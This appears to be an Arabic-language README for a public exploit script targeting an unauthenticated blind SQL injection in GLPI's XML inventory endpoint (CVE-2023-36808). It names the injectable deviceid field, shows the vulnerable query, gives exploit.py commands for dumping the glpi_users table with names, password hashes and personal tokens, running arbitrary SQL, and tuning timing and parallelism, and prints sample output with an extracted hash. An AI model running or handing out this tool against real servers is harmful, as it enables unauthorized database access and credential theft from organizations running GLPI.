
GLPI cve-2023-36808
إصدارات GLPI الأقل من 10.0.10 تعرض نقطة نهاية جرد XML غير مصادق عليها في /front/inventory.php.
يتم حقن حقل <deviceid> مباشرة في استعلام SQL دون تعقيم:
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'
لا يلزم وجود مصادقة. تسمح الثغرة بالوصول الكامل للقراءة من قاعدة البيانات عبر حقن SQL أعمى.
يستخدم هذا السكريبت الحقن الأعمى المستند إلى الوقت مع البحث الثنائي لاستخراج البيانات بشكل أسرع بكثير من الأدوات العامة.
pip install -r requirements.txt
# تفريغ جدول glpi_users بالكامل (الاسم، تجزئة كلمة المرور، الرمز الشخصي)
python3 exploit.py http://<TARGET>/glpi
# استعلام SQL مخصص
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"
# ضبط التوقيت (نوم أقل = أسرع، قم بزيادته إذا حصلت على نتائج خاطئة)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3
# زيادة حد الطلبات المتوازية (الافتراضي 2، قم برفعه للأهداف البعيدة عالية التأخير)
python3 exploit.py http://<TARGET>/glpi --parallel 4
[*] CVE-2023-36808 - GLPI حقن SQL غير مصادق عليه
[*] الهدف : http://10.0.0.1/glpi/front/inventory.php
[*] النوم : 0.5s العتبة: 0.35s التوازي: 2
[+] الهدف يمكن الوصول إليه
[+] تأكيد الحقن
[*] المستخدم 1/7
الاسم glpi
كلمة المرور $2y$10$xN.12pQxSLlQdMJzP26EWe...
الرمز الشخصي xxxx
...